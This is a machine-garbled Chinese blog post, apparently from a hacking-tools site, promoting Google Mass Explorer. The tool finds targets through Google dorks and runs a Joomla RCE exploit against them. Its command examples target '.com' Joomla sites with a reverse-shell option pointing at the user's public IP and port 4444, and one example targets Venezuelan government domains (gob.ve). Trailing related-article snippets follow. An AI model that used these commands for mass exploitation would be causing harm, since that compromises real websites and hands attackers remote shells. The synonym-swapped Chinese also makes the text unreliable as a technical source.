好用的Google缝隙爬虫:Google Mass Explorer

访客5年前黑客工具1272


这是一款根据谷歌搜索引擎的自动化爬虫。
爬虫介绍
爬虫大体机制便是:
先进行一次谷歌搜索,将成果解析为特定格局,然后再提供给exp运用。
我们能够测验运用–help来列出一切参数。
这个项目笔者会持续更新,今后再增加新的exp进行晋级。此外,它会运用google_parsers模块去构建exp解析搜索成果,所以当你开端搜索时,能够挑选“–exploit parser”参数来指定相应exp。
google parsers模块(google_parsers.py)今后还会持续优化,而现在的exp只含有joomla cve,究竟这个项目首要是给我们自己diy运用的。可是,假如你不会弄exp,把运用exp提交给过来也行。
因为笔者平常仍是比较忙,所以没有太多时刻去手动搜索方针。故而,笔者测验运用Selenium框架去造了个爬虫来查找测验方针。至于搜索过程中呈现的Google的验证码,它需求其他库和模块来辅佐处理。在项目里运用Selenium后,我们就能够在谷歌呈现验证码的是时分,自行手动输入验证码,然后爬虫就能够持续爬行了。这大概是笔者能想出的更好的处理验证码防护的办法了。
简略概述下爬虫是怎么作业的:
1. 履行谷歌搜索
2. 从每一页解析成果
3. 测验是否成果中含有缝隙
依靠与需求
这个项目需求python3,运用requirements装置依靠库的办法如下:
$ sudo pip install -r requirements.txt
运转示例:
python3 google_explorer.py --dork="site:*.com inurl:index.php?option=" --browser="chrome" --exploit_parser="joomla_15_12_2019_rce" --revshell="MY_PUBLIC_IP" --port=4444 --google_domain="google.com" --location="França" --last_update="no último mês"
在上面的比方里,笔者是在寻觅法国的joomla RCE方针,运用的是google_domains.txt里边的google域名(比方google.co.uk)来作为搜索引擎,“–last_update”则代表着搜索成果的更新时刻为上个月。
上面比方里的选项适用于任何言语,首要决定于google针对相应的国家给出的语法。
下面再给出一个简略的比方:
python3 google_explorer.py --browser='chrome' --dork='site:gob.ve inurl:index.php' --location="Venezuela"
当然,这些exp也是能够独自运用的:
$ cd xpl_parsers
$ python joomla_cve_2019_8562.py
独自测验exp的办法:
$ cd exploits
$ python exploiter.py --file
 

相关文章

从零开始学Fuzzing系列:带领nduja打破Grinder的壁垒

四年前开源的Grinder项目,和借助于它运转的nduja,着实让浏览器缝隙发掘飞入了寻常百姓家。但随着时刻的检测,Grinder也遇到了让人爱恨交加的为难:分明发生了Crash,可便是无法重现。有多...

Django 开发中你不可不知的 7 个 Web 安全头-黑客接单平台

Web 是一个不断发展的渠道,有许多向后兼容的问题。 新的 web 安全实践一般来自于对存在缺点的旧功用的知道。 与其经过改动这些功用来损坏旧网站,还不如挑选参加一些更安全的设置。 你能够经过设置 H...

网站检测提示的“Flash装备不妥”是什么缝隙?

 360站长渠道中有一个东西是“官网直达”,经过恳求能够使你的网站在360搜索成果中加上“官网”字样的标识,百度也有这样的东西,不过是收费的,所以趁着360还没收费,有爱好的朋友可认为自己的网站恳求一...

xHunt:针对科威特航运组织的攻击行动-黑客接单平台

2019年5月至6月,unit42安全团队在一起针对科威特航运业的进犯事情中,检测到了一个新后门东西——Hisoka,它的作用是下载几个的定制东西进行后缝隙运用,一切东西好像都由同一个开发人员创立,最...

根据SQLite数据库的Web应用程序注入攻略

SQL注入又称hacking之母,是形成网络世界巨大损失而臭名远扬的缝隙之一,研究人员现已发布了许多关于不同SQL服务的不同进犯技巧相关文章。关于MSSQL,MySQL和ORACLE数据库来说,SQL...

云、管、端三重失守,大范围挂马进犯剖析

0x00 源起 从3月5日开端,腾讯反病毒实验室监控到很多闻名软件客户端存在开释下载器病毒的反常数据,预示着或许存在经过挂马方法大规模进犯闻名软件客户端的行为。电脑管家紧迫对相关数据进行剖析排查,终究...